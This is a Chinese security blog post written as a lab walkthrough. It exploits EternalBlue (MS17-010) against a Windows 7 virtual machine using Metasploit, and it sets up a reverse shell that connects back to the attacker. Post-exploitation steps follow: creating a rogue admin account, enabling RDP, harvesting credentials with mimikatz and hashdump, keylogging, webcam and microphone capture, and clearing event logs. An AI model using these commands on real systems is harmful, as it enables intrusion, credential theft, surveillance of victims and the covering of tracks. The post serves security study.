<!DOCTYPE html><html lang="zh-CN | zh-TW | en" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><title>永恒之蓝漏洞利用+后渗透 | Corey's Blog</title><meta name="description" content="永恒之蓝漏洞利用+后渗透"><meta name="keywords" content="windows,系统漏洞"><meta name="author" content="Corey"><meta name="copyright" content="Corey"><meta name="format-detection" content="telephone=no"><link rel="shortcut icon" href="/img/title.ico"><link rel="preconnect" href="//cdn.jsdelivr.net"><meta name="twitter:card" content="summary_large_image"><meta name="twitter:title" content="永恒之蓝漏洞利用+后渗透"><meta name="twitter:description" content="永恒之蓝漏洞利用+后渗透"><meta name="twitter:image" content="https://c-hasel.github.io/img/ms17010/cover.jpg"><meta property="og:type" content="article"><meta property="og:title" content="永恒之蓝漏洞利用+后渗透"><meta property="og:url" content="https://c-hasel.github.io/2019/12/05/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/"><meta property="og:site_name" content="Corey's Blog"><meta property="og:description" content="永恒之蓝漏洞利用+后渗透"><meta property="og:image" content="https://c-hasel.github.io/img/ms17010/cover.jpg"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script src="https://cdn.jsdelivr.net/npm/js-cookie/dist/js.cookie.min.js"></script><script>const autoChangeMode = '1'
var t = Cookies.get("theme");
if (autoChangeMode == '1'){
const isDarkMode = window.matchMedia("(prefers-color-scheme: dark)").matches
const isLightMode = window.matchMedia("(prefers-color-scheme: light)").matches
const isNotSpecified = window.matchMedia("(prefers-color-scheme: no-preference)").matches
const hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

if (t === undefined){
  if (isLightMode) activateLightMode()
  else if (isDarkMode) activateDarkMode()
  else if (isNotSpecified || hasNoSupport){
    console.log('You specified no preference for a color scheme or your browser does not support it. I Schedule dark mode during night time.')
    now = new Date();
    hour = now.getHours();
    isNight = hour < 6 || hour >= 18
    isNight ? activateDarkMode() : activateLightMode()
}
} else if (t == 'light') activateLightMode()
else activateDarkMode()


} else if (autoChangeMode == '2'){
  now = new Date();
  hour = now.getHours();
  isNight = hour < 6 || hour >= 18
  if(t === undefined) isNight? activateDarkMode() : activateLightMode()
  else if (t === 'light') activateLightMode()
  else activateDarkMode() 
} else {
  if ( t == 'dark' ) activateDarkMode()
  else if ( t == 'light') activateLightMode()
}

function activateDarkMode(){
  document.documentElement.setAttribute('data-theme', 'dark')
  if (document.querySelector('meta[name="theme-color"]') !== null){
    document.querySelector('meta[name="theme-color"]').setAttribute('content','#000')
  }
}
function activateLightMode(){
  document.documentElement.setAttribute('data-theme', 'light')
  if (document.querySelector('meta[name="theme-color"]') !== null){
  document.querySelector('meta[name="theme-color"]').setAttribute('content','#fff')
  }
}</script><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/node-snackbar@0.1.15/dist/snackbar.min.css"><link rel="canonical" href="https://c-hasel.github.io/2019/12/05/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/"><link rel="prev" title="使用nmap脚本扫描CVE漏洞" href="https://c-hasel.github.io/2019/12/12/%E5%88%A9%E7%94%A8nmap%E6%89%AB%E6%8F%8FCVE%E6%BC%8F%E6%B4%9E/"><link rel="next" title="hexo博客搭建三:自定义域名绑定githu+coding" href="https://c-hasel.github.io/2019/12/02/hexo%E5%8D%9A%E5%AE%A2%E6%90%AD%E5%BB%BA%E4%B8%89/"><link rel="dns-prefetch" href="https://hm.baidu.com"><script>var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?8cf44a0d0c76920bca7b320c3db0faf8";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Titillium+Web"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容:${query}"}},
  translate: {"defaultEncoding":2,"translateDelay":0,"cookieDomain":"https://c-hasel.github.io","msgToTraditionalChinese":"繁","msgToSimplifiedChinese":"简"},
  highlight_copy: 'true',
  highlight_lang: 'true',
  highlight_shrink: 'false',
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  bookmark: {
    title: 'Snackbar.bookmark.title',
    message_prev: '按',
    message_next: '键将本页加入书签'
  },
  runtime_unit: '天',
  copyright: undefined,
  copy_copyright_js: false,
  ClickShowText: undefined,
  medium_zoom: 'false',
  Snackbar: {"bookmark":{"title":"Snackbar.bookmark.title","message_prev":"按","message_next":"键将本页加入书签"},"chs_to_cht":"你已切换为繁体","cht_to_chs":"你已切换为简体","day_to_night":"你已切换为深色模式","night_to_day":"你已切换为浅色模式","bgLight":"#49b1f5","bgDark":"#2d3035","position":"bottom-left"}
  
}</script><link rel="alternate" href="/atom.xml" title="Corey's Blog" type="application/atom+xml">
<script src="/assets/js/DPlayer.min.js"></script><link rel="stylesheet" type="text/css" href="/assets/css/DPlayer.min.css"></head><body><canvas class="fireworks"></canvas><div id="header"> <div id="page-header"><span class="pull_left" id="blog_name"><a class="blog_title" id="site-name" href="/">Corey's Blog</a></span><i class="fa fa-bars fa-fw toggle-menu pull_right close" aria-hidden="true"></i><span class="pull_right menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> 主页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> 总览</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fa fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fa fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fa fa-link"></i><span> 友情链接</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fa fa-heart"></i><span> 关于我</span></a></div><div class="menus_item"><a class="site-page" href="/guestbook/"><i class="fa-fw fa fa-coffee"></i><span> 留言</span></a></div><div class="menus_item"><a class="site-page"><i class="fa-fw fa fa-list" aria-hidden="true"></i><span> List</span><i class="fa fa-chevron-down menus-expand" aria-hidden="true"></i></a><ul class="menus_item_child"><li><a class="site-page" href="/music/"><i class="fa-fw fa fa-music"></i><span> 音乐</span></a></li><li><a class="site-page" href="/movies/"><i class="fa-fw fa fa-film"></i><span> 视频</span></a></li><li><a class="site-page" href="/gallery/"><i class="fa-fw fa fa-photo"></i><span> 相册</span></a></li></ul></div></div></span><span class="pull_right" id="search_button"><a class="site-page social-icon search"><i class="fa fa-search fa-fw"></i><span> 搜索</span></a></span></div></div><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="lazyload avatar_img" src="/img/logo.jpg" onerror="onerror=null;src='/img/friend_404.gif'"></div><div class="mobile_post_data"><div class="mobile_data_item is_center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">文章</div><div class="length_num">10</div></a></div></div><div class="mobile_data_item is_center">      <div class="mobile_data_link"><a href="/tags/"><div class="headline">标签</div><div class="length_num">14</div></a></div></div><div class="mobile_data_item is_center">     <div class="mobile_data_link"><a href="/categories/"><div class="headline">分类</div><div class="length_num">6</div></a></div></div></div><hr><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> 主页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> 总览</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fa fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fa fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fa fa-link"></i><span> 友情链接</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fa fa-heart"></i><span> 关于我</span></a></div><div class="menus_item"><a class="site-page" href="/guestbook/"><i class="fa-fw fa fa-coffee"></i><span> 留言</span></a></div><div class="menus_item"><a class="site-page"><i class="fa-fw fa fa-list" aria-hidden="true"></i><span> List</span><i class="fa fa-chevron-down menus-expand" aria-hidden="true"></i></a><ul class="menus_item_child"><li><a class="site-page" href="/music/"><i class="fa-fw fa fa-music"></i><span> 音乐</span></a></li><li><a class="site-page" href="/movies/"><i class="fa-fw fa fa-film"></i><span> 视频</span></a></li><li><a class="site-page" href="/gallery/"><i class="fa-fw fa fa-photo"></i><span> 相册</span></a></li></ul></div></div></div><div id="mobile-sidebar-toc"><div class="toc_mobile_headline">目录</div><ol class="toc_mobile_items"><li class="toc_mobile_items-item toc_mobile_items-level-1"><a class="toc_mobile_items-link" href="#漏洞原理"><span class="toc_mobile_items-number">1.</span> <span class="toc_mobile_items-text">漏洞原理</span></a><ol class="toc_mobile_items-child"><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#简介："><span class="toc_mobile_items-number">1.1.</span> <span class="toc_mobile_items-text">简介：</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#漏洞原理代码详解"><span class="toc_mobile_items-number">1.2.</span> <span class="toc_mobile_items-text">漏洞原理代码详解</span></a></li></ol></li><li class="toc_mobile_items-item toc_mobile_items-level-1"><a class="toc_mobile_items-link" href="#漏洞复现"><span class="toc_mobile_items-number">2.</span> <span class="toc_mobile_items-text">漏洞复现</span></a><ol class="toc_mobile_items-child"><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#工具准备"><span class="toc_mobile_items-number">2.1.</span> <span class="toc_mobile_items-text">工具准备</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#信息收集"><span class="toc_mobile_items-number">2.2.</span> <span class="toc_mobile_items-text">信息收集</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#尝试攻击"><span class="toc_mobile_items-number">2.3.</span> <span class="toc_mobile_items-text">尝试攻击</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#get-shell"><span class="toc_mobile_items-number">2.4.</span> <span class="toc_mobile_items-text">get shell</span></a></li></ol></li><li class="toc_mobile_items-item toc_mobile_items-level-1"><a class="toc_mobile_items-link" href="#msf后渗透"><span class="toc_mobile_items-number">3.</span> <span class="toc_mobile_items-text">msf后渗透</span></a></li></ol></div></div><div id="body-wrap"><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true">     </i><div class="auto_open" id="sidebar"><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#漏洞原理"><span class="toc-number">1.</span> <span class="toc-text">漏洞原理</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#简介："><span class="toc-number">1.1.</span> <span class="toc-text">简介：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞原理代码详解"><span class="toc-number">1.2.</span> <span class="toc-text">漏洞原理代码详解</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#漏洞复现"><span class="toc-number">2.</span> <span class="toc-text">漏洞复现</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#工具准备"><span class="toc-number">2.1.</span> <span class="toc-text">工具准备</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#信息收集"><span class="toc-number">2.2.</span> <span class="toc-text">信息收集</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#尝试攻击"><span class="toc-number">2.3.</span> <span class="toc-text">尝试攻击</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#get-shell"><span class="toc-number">2.4.</span> <span class="toc-text">get shell</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#msf后渗透"><span class="toc-number">3.</span> <span class="toc-text">msf后渗透</span></a></li></ol></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(/img/ms17010/top.jpg)"><div id="post-info"><div id="post-title"><div class="posttitle">永恒之蓝漏洞利用+后渗透</div></div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 发表于 2019-12-05<span class="post-meta__separator">|</span><i class="fa fa-history" aria-hidden="true"></i> 更新于 2020-03-02</time><span class="post-meta__separator mobile_hidden">|</span><span class="mobile_hidden"><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/">漏洞利用</a></span><div class="post-meta-wordcount"><i class="fa fa-file-word-o post-meta__icon" aria-hidden="true"></i><span>字数总计: </span><span class="word-count">1.4k</span><span class="post-meta__separator">|</span><i class="fa fa-clock-o post-meta__icon" aria-hidden="true"></i><span>阅读时长: 4 分钟</span><span class="post-meta__separator">|</span><i class="fa fa-eye post-meta__icon" aria-hidden="true">       </i><span>阅读量: </span><span id="busuanzi_value_page_pv"></span></div></div></div></div><div class="layout layout_post" id="content-inner">   <article id="post"><div class="article-container" id="post-content"><h1 id="漏洞原理"><a href="#漏洞原理" class="headerlink" title="漏洞原理"></a>漏洞原理</h1><h2 id="简介："><a href="#简介：" class="headerlink" title="简介："></a>简介：</h2><ul>
<li><p>永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对<strong>SMB服务</strong>进行攻击的漏洞，该漏洞导致攻击者在目标系统上<strong>可以执行任意代码</strong>。  </p>
</li>
<li><p>注:SMB服务的作用:该服务器在windows与UNIX系列OS之间搭建起一座桥梁，让两者的资源可互通有无。</p>
</li>
</ul>
<h2 id="漏洞原理代码详解"><a href="#漏洞原理代码详解" class="headerlink" title="漏洞原理代码详解"></a>漏洞原理代码详解</h2><p><strong>下面两篇文章从实际代码详细分析了漏洞原理，想要从代码详细理解漏洞的同学可以点击查看</strong></p>
<ul>
<li><a href="http://blogs.360.cn/post/nsa-eternalblue-smb.html#toc-772" target="_blank" rel="noopener">http://blogs.360.cn/post/nsa-eternalblue-smb.html#toc-772</a></li>
<li><a href="https://blog.csdn.net/qq_27446553/article/details/73480807" target="_blank" rel="noopener">https://blog.csdn.net/qq_27446553/article/details/73480807</a><h1 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h1><h2 id="工具准备"><a href="#工具准备" class="headerlink" title="工具准备"></a>工具准备</h2>首先我们需要准备一台kali攻击机，IP:172.22.163.97和一台开放445端口有永恒之蓝漏洞的win7虚拟机,IP:172.22.162.210<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2>信息收集的方法有很多，我们可以使用nmap，nc等来获取被攻击机的一些版本信息，我们也可以使用kali的<a href="https://www.metasploit.com/" target="_blank" rel="noopener">metasploit</a>中的扫描模块。<h2 id="尝试攻击"><a href="#尝试攻击" class="headerlink" title="尝试攻击"></a>尝试攻击</h2>在kali终端中输入<code>msfconsole</code><br><img alt data-src="/img/ms17010/msf.png" class="lazyload"></li>
</ul>
<ol>
<li>搜索漏洞模块<br>在kali终端输入<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">search ms17-010</span><br></pre></td></tr></table></figure>
<img alt data-src="/img/ms17010/search.png" class="lazyload"></li>
<li>加载扫描模块<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">use auxiliary/scanner/smb/smb_ms17_010</span><br></pre></td></tr></table></figure>
<img alt data-src="/img/ms17010/scanner.png" class="lazyload"><br>输入要扫描的IP <figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">set</span> rhosts 172.22.162.210</span><br><span class="line">run</span><br></pre></td></tr></table></figure>
扫描结果显示该主机很容易受到ms17-010的攻击<br><img alt data-src="/img/ms17010/rhosts.png" class="lazyload"><br>如果要进行全网段扫描可以在设置目标的时候输入<code>set rhosts 网段/掩码位数</code>，再设置线程<code>set threads 100</code>就可以进行全网段扫描了。</li>
<li>使用攻击模块<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">use exploit/windows/smb/ms17_010_eternalblue</span><br><span class="line"><span class="built_in">set</span> payload windows/x64/meterpreter/reverse_tcp</span><br><span class="line"><span class="built_in">set</span> rhosts 172.22.162.210</span><br><span class="line"><span class="built_in">set</span> lhost 172.22.163.97</span><br><span class="line">run</span><br></pre></td></tr></table></figure>
选择攻击模块时要注意选择合适的版本，有些版本适用于win8以上</li>
</ol>
<ul>
<li><code>set payload</code>:设置payload，这里用<code>set payload windows/x64/meterpreter/reverse_tcp</code><br>因为目标主机是64位主机，所以我们要用到的payload为windows x64,要选用其他payload可以<strong>使用show payloads查看适合要攻击的目标主机的payload</strong></li>
<li><code>show options</code>:使用该命令会列出使用当前模块所需要配置的参数</li>
<li><code>set rhosts</code>:目标主机地址:该命令会设置好需要攻击的目标主机地址</li>
<li><code>set lhost</code>:攻击机地址:该命令设置攻击机的地址，是目标主机回连至攻击机</li>
<li><code>set lport</code>:回连的端口:该命令会设置主机回连至攻击机的端口，默认为4444</li>
<li><code>run</code>:开始攻击</li>
</ul>
<p><strong>攻击成功后攻击机和目标主机之间会建立一个连接，得到一个meterpreter回话</strong><br><img alt data-src="/img/ms17010/run.png" class="lazyload"><br><img alt data-src="/img/ms17010/meter.png" class="lazyload"></p>
<h2 id="get-shell"><a href="#get-shell" class="headerlink" title="get shell"></a>get shell</h2><ol>
<li>获取shell(windwos主机的cmd)<br><img alt data-src="/img/ms17010/shell.png" class="lazyload"><br>如果发现乱码输入<code>chcp 65001</code>即可改变编码</li>
<li>提权<br>当我们获取了shell后权限是很低的，这个时候我们就新建一个名为test的管理员，密码为123456<br><img alt data-src="/img/ms17010/admin.png" class="lazyload"></li>
<li>远程连接<br>打开3389端口方便我们远程连接这台主机<code>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal&quot; &quot;Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f</code><br><img alt data-src="/img/ms17010/3389.png" class="lazyload"><br>新建一个终端窗口输入<code>rdesktop 172.22.162.210</code></li>
</ol>
<ul>
<li><code>-u</code>:指定用户名</li>
<li><code>-p</code>:指定密码</li>
<li><code>-f</code>:全屏显示<br>更多参数输入<code>rdesktop --help</code></li>
</ul>
<p>选择其他用户登录我们之前创建的test用户就可以图形化操作了<br><img alt data-src="/img/ms17010/rdesktop.png" class="lazyload"><br><img alt data-src="/img/ms17010/rdesk.png" class="lazyload"></p>
<p>该永恒之蓝模块只适用于64位win7和server2008<br>要是现在有一台存在漏洞的32位2003系统该怎么办<br>这里我们就需要用到永恒之蓝的另一个模块<br><code>use exploit/windows/smb/ms17_010_psexec</code><br>这个模块支持server2003这样的老系统并支持32位系统<br><code>set payload windows/meterpreter/bind_tcp</code></p>
<h1 id="msf后渗透"><a href="#msf后渗透" class="headerlink" title="msf后渗透"></a>msf后渗透</h1><p>返回Metasploit继续操作<br>在之前的shell界面输入exit<br><img alt data-src="/img/ms17010/exit.png" class="lazyload"></p>
<ul>
<li>查看用户密码<ol>
<li>加载mimikatz:<code>laod mimikatz</code></li>
<li>获取明文密码:<code>kerberos</code>，如果开机没使用密码kerberos是抓取不到的，也可以用<code>wdigest</code></li>
</ol>
</li>
</ul>
<p><img alt data-src="/img/ms17010/mimikatz.png" class="lazyload"><br><strong>如果在提权之前用kerberos获取到内存中的管理员密码可以减少提权这一步哦</strong></p>
<ul>
<li><code>getuid</code>查看当前用户</li>
</ul>
<p><img alt data-src="/img/ms17010/uid.png" class="lazyload"></p>
<ul>
<li><code>sysinfo</code>查看系统信息</li>
</ul>
<p><img alt data-src="/img/ms17010/sys.png" class="lazyload"></p>
<ul>
<li><code>ifconfig</code>查看网卡信息</li>
</ul>
<p><img alt data-src="/img/ms17010/network.png" class="lazyload"></p>
<ul>
<li><code>ps</code>查看任务管理器</li>
</ul>
<p><img alt data-src="/img/ms17010/ps.png" class="lazyload"></p>
<ul>
<li><code>hashdump</code>查看用户hash</li>
</ul>
<p><img alt data-src="/img/ms17010/hash.png" class="lazyload"></p>
<ul>
<li>监听键盘记录<br>首先我们要迁移到对应用户的进程上<br>先用ps查看下进程</li>
</ul>
<p><img alt data-src="/img/ms17010/ps2.png" class="lazyload"><br>我们发现administrator的进程为1968<br><code>migrate 1968</code><br>将进程迁移到administrator进程上<br><code>getuid</code>查看当前用户已经切换到了administrator<br><img alt data-src="/img/ms17010/1986.png" class="lazyload"><br><code>keyscan_start</code><br>开始监听键盘记录<br>这时我们模拟一下登录qq邮箱<br><code>keyscan_dump</code><br>查看监听的键盘记录<br><img alt data-src="/img/ms17010/key.png" class="lazyload"><br>通过监听键盘记录发现主机访问了qq邮箱输入了qq号:te退格退格123456和密码:test123tabtest132<br><code>keyscan_stop</code><br>停止键盘监听</p>
<ul>
<li><p><code>uictl</code>键盘/鼠标开关<strong>必须要32位主机</strong></p>
<ul>
<li><code>uictl enable/disable keyboard</code>开启或禁用键盘</li>
<li><code>uictl enable/disable mouse</code>开启或禁用鼠标</li>
<li><code>uictl enable/disable all</code>开启或禁用键盘鼠标</li>
</ul>
</li>
<li><p><code>webcam</code>查看摄像头</p>
<ul>
<li><code>webcam_list</code>:查看摄像头列表</li>
<li><code>webcam_snap</code>:通过摄像头拍照</li>
<li><code>webcam_stream</code>:通过摄像头开启视频<br>由于我是虚拟机，检测不到摄像头驱动。</li>
</ul>
</li>
<li><p><code>execute</code>执行文件</p>
<ul>
<li><code>execute -f</code>执行制定文件</li>
<li><code>execute -H -i -f cmd.exe</code>创建新的cmd，-H不可见，-i交互</li>
</ul>
</li>
</ul>
<p><img alt data-src="/img/ms17010/execute.png" class="lazyload"></p>
<ul>
<li><code>screenshot</code>:截屏</li>
<li><code>screenshare</code>:查看实时共享屏幕<center>左边为攻击机，右边为被攻击主机</center>

</li>
</ul>
<div id="dplayer0" class="dplayer hexo-tag-dplayer-mark" style="margin-bottom: 20px;"></div><script>(function(){var player = new DPlayer({"container":document.getElementById("dplayer0"),"hotkey":true,"mutex":true,"video":{"url":"/img/ms17010/share.mp4"}});window.dplayers||(window.dplayers=[]);window.dplayers.push(player);})()</script>

<ul>
<li><code>record_mic</code>:记录声音</li>
<li><code>clearev</code>:清理日志</li>
</ul>
<div class="note warning">
            <p><strong>严重声明</strong>：本站内容仅适于网络安全技术和信息安全爱好者学习研究使用，禁止用于非法用途，学习中请遵循国家相关法律法规，共同维护网络安全</p>
          </div>


</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined" target="_blank" rel="noopener">Corey</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://c-hasel.github.io/2019/12/05/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/">https://c-hasel.github.io/2019/12/05/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="noopener">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://c-hasel.github.io">Corey's Blog</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/windows/">windows    </a><a class="post-meta__tags" href="/tags/%E7%B3%BB%E7%BB%9F%E6%BC%8F%E6%B4%9E/">系统漏洞    </a></div><div class="post_share"><div class="social-share" data-image="/img/ms17010/cover.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/js/social-share.min.js"></script></div></div><div class="post-reward"><a class="reward-button"><i class="fa fa-qrcode"></i> 打赏<div class="reward-main"><ul class="reward-all"><li class="reward-item"><img class="lazyload post-qr-code__img" src="/img/wechat.jpg"><div class="post-qr-code__desc">微信</div></li><li class="reward-item"><img class="lazyload post-qr-code__img" src="/img/alipay.jpg"><div class="post-qr-code__desc">支付宝</div></li></ul></div></a></div><nav class="pagination_post" id="pagination"><div class="prev-post pull_left"><a href="/2019/12/12/%E5%88%A9%E7%94%A8nmap%E6%89%AB%E6%8F%8FCVE%E6%BC%8F%E6%B4%9E/"><img class="prev_cover lazyload" data-src="/img/nmap/top.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="label">上一篇</div><div class="prev_info"><span>使用nmap脚本扫描CVE漏洞</span></div></a></div><div class="next-post pull_right"><a href="/2019/12/02/hexo%E5%8D%9A%E5%AE%A2%E6%90%AD%E5%BB%BA%E4%B8%89/"><img class="next_cover lazyload" data-src="/img/hexo域名分流/cover.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="label">下一篇</div><div class="next_info"><span>hexo博客搭建三:自定义域名绑定githu+coding</span></div></a></div></nav><hr><div id="post-comment"><div class="comment_headling"><i class="fa fa-comments fa-fw" aria-hidden="true"></i><span> 评论</span></div><div class="vcomment" id="vcomment"></div><script src="https://cdn.jsdelivr.net/npm/valine/dist/Valine.min.js"></script><script>var notify = false == true ? true : false;
var verify = false == true ? true : false;
var GUEST_INFO = ['nick','mail','link'];
var guest_info = 'nick,mail,link'.split(',').filter(function(item){
  return GUEST_INFO.indexOf(item) > -1
});
guest_info = guest_info.length == 0 ? GUEST_INFO :guest_info;

window.valine = new Valine({
  el:'#vcomment',
  notify:notify,
  verify:verify,
  appId:'vsi8rE46G0cTEkxdVWUvi0k1-gzGzoHsz',
  appKey:'50q23IS6BRU2VveSBQtm9Pw8',
  placeholder:'Please leave your footprints',
  avatar:'monsterid',
  guest_info:guest_info,
  pageSize:'10',
  lang:'zh-cn',
  recordIP: true
});</script></div></div></div><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2019 - 2022 By Corey</div><div class="framework-info"><span>驱动 </span><a href="http://hexo.io" target="_blank" rel="noopener"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 </span><a href="https://github.com/jerryc127/hexo-theme-butterfly" target="_blank" rel="noopener"><span>Butterfly</span></a></div><div class="footer_custom_text">Hi,welcome to <a href="https://c-hasel.github.io">my blog</a>!</div></div></footer></div><section class="rightside" id="rightside"><div id="rightside-config-hide"><i class="fa fa-book" id="readmode" title="阅读模式"></i><i class="fa fa-plus" id="font_plus" title="放大字体"></i><i class="fa fa-minus" id="font_minus" title="缩小字体"></i><a class="translate_chn_to_cht" id="translateLink" href="javascript:translatePage();" title="简繁转换" target="_self">繁</a><i class="darkmode fa fa-moon-o" id="darkmode" title="夜间模式"></i></div><div id="rightside-config-show"><div id="rightside_config" title="设置"><i class="fa fa-cog" aria-hidden="true"></i></div><a id="to_comment" href="#post-comment" title="直达评论"><i class="scroll_to_comment fa fa-comments">  </i></a><i class="fa fa-list-ul close" id="mobile-toc-button" title="目录" aria-hidden="true"></i><i class="fa fa-arrow-up" id="go-up" title="回到顶部" aria-hidden="true"></i></div></section><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script async src="/js/search/local-search.js"></script><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="/js/third-party/fireworks.js"></script><script src="https://cdn.jsdelivr.net/npm/node-snackbar@0.1.15/dist/snackbar.min.js"></script><script id="ribbon" src="/js/third-party/canvas-ribbon.js" size="150" alpha="0.6" zIndex="-1" mobile="false" data-click="false"></script><script id="ribbon_piao" mobile="false" src="/js/third-party/piao.js"></script><script id="canvas_nest" color="0,0,255" opacity="0.7" zIndex="-1" count="99" mobile="false" src="/js/third-party/canvas-nest.js"></script><script src="/js/baidupush.js"> </script><script src="/js/third-party/activate-power-mode.js"></script><script>POWERMODE.colorful = true; // make power mode colorful
POWERMODE.shake = true; // turn off shake
document.body.addEventListener('input', POWERMODE);
</script><script src="/js/tw_cn.js"></script><script>translateInitilization()
